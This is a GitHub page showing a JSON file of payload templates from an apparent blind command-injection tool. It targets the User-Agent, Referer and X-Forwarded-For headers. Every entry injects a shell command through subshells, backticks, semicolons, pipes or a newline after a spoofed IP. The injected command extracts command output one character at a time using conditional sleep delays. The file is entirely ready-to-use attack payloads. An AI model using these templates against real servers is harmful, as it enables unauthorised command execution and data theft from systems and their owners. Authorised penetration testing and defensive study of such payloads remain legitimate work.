blind-cmdi/payloads.json at main · MuhammetSec/blind-cmdi · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
{
    "time_based": {
        "user-agent": [
            {
                "description": "Bash subshell with cut character extraction and conditional sleep",
                "template": "'$( [ \"$(CMD | cut -cPOS)\" = \"CHAR\" ] && sleep DELAY )'"
            },
            {
                "description": "Inline if-then via backtick substitution with cut",
                "template": "`if [ \"$(CMD | cut -cPOS)\" = \"CHAR\" ]; then sleep DELAY; fi`"
            },
            {
                "description": "Pipe to awk for character extraction with conditional sleep",
                "template": "$( [ \"$(CMD | awk '{print substr($0,POS,1)}')\" = \"CHAR\" ] && sleep DELAY )"
            },
            {
                "description": "Perl one-liner character comparison with sleep",
                "template": "$( perl -e '$c=(split //,`CMD`)[POS-1]; if($c eq \"CHAR\"){sleep DELAY}' )"
            },
            {
                "description": "Python one-liner subprocess check with time.sleep",
                "template": "$( python3 -c \"import os,time;c=os.popen('CMD').read()[POS-1];time.sleep(DELAY) if c=='CHAR' else None\" )"
            }
        ],
        "referer": [
            {
                "description": "Bash subshell with cut character extraction and conditional sleep",
                "template": "$( [ \"$(CMD | cut -cPOS)\" = \"CHAR\" ] && sleep DELAY )"
            },
            {
                "description": "Chained OR with false to trigger sleep on match via expr substr",
                "template": "$( [ \"$(expr substr \"$(CMD)\" POS 1)\" = \"CHAR\" ] && sleep DELAY )"
            },
            {
                "description": "Bash parameter expansion with conditional sleep",
                "template": "$( VAL=$(CMD); [ \"${VAL:POS-1:1}\" = \"CHAR\" ] && sleep DELAY )"
            },
            {
                "description": "Sed-based single character extraction with conditional sleep",
                "template": "$( [ \"$(CMD | sed -n 's/^.\\{POS-1\\}\\(.\\).*/\\1/p')\" = \"CHAR\" ] && sleep DELAY )"
            },
            {
                "description": "Double-pipe fallback sleep after inverse test",
                "template": "$( [ \"$(CMD | cut -cPOS)\" != \"CHAR\" ] || sleep DELAY )"
            }
        ],
        "x-forwarded-for": [
            {
                "description": "Bash subshell with cut character extraction and conditional sleep",
                "template": "127.0.0.1; [ \"$(CMD | cut -cPOS)\" = \"CHAR\" ] && sleep DELAY"
            },
            {
                "description": "Semicolon-separated inline if-then-fi after spoofed IP",
                "template": "127.0.0.1; if [ \"$(CMD | cut -cPOS)\" = \"CHAR\" ]; then sleep DELAY; fi"
            },
            {
                "description": "Pipe-appended subshell after spoofed IP with awk extraction",
                "template": "127.0.0.1 | [ \"$(CMD | awk '{print substr($0,POS,1)}')\" = \"CHAR\" ] && sleep DELAY"
            },
            {
                "description": "Newline-injected conditional sleep after spoofed IP",
                "template": "127.0.0.1\n[ \"$(CMD | cut -cPOS)\" = \"CHAR\" ] && sleep DELAY"
            },
            {
                "description": "Backtick substitution with cut after spoofed IP",
                "template": "127.0.0.1; `[ \"$(CMD | cut -cPOS)\" = \"CHAR\" ] && sleep DELAY`"
            }
        ]
    }
}